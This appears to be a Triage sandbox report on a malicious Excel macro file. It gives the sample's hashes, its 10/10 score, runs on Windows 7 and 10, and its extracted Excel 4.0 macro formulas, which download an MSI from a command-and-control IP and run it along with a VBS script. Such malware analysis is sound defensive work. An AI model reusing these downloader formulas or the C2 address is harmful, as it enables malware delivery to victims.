0a504767ef0d0948d7385efb55fd9417 | Triage

Submit
Reports

Overview

overview

Static

static

0a504767ef...7.xlsm

windows7-x64

0a504767ef...7.xlsm

windows10-2004-x64

Sharing

Static task

static1

Behavioral task

behavioral1

Sample

0a504767ef0d0948d7385efb55fd9417.xlsm

Resource

win7-20231215-en

windows7-x64

8 signatures

150 seconds

Behavioral task

behavioral2

Sample

0a504767ef0d0948d7385efb55fd9417.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

9 signatures

150 seconds

General

Target

0a504767ef0d0948d7385efb55fd9417
Size

6KB
MD5

0a504767ef0d0948d7385efb55fd9417
SHA1

0a3a9185b5be376ece7103f2671a9fe436216093
SHA256

2e2c2f7752b202262175a10f7a7f23bd1b5b9b9ecce0155e2ab04daac0717811
SHA512

ef6407dbed7fafc80aceed6f50acbb2d192c0b192ad3eed812883f5845343b012c8245f5c77e3ab62f5fc1b30c4a98bed51d3931e7436c5101ea57739c2d350f
SSDEEP

192:NDS4uS81aEOmmfRZ8UhHFBFYuHb98yKXQs:NTuVw/1FYSb98yKAs

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187

Attributes

formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Signatures

Files

0a504767ef0d0948d7385efb55fd9417
.xlsm office2007

© 2018-2025

Terms | Privacy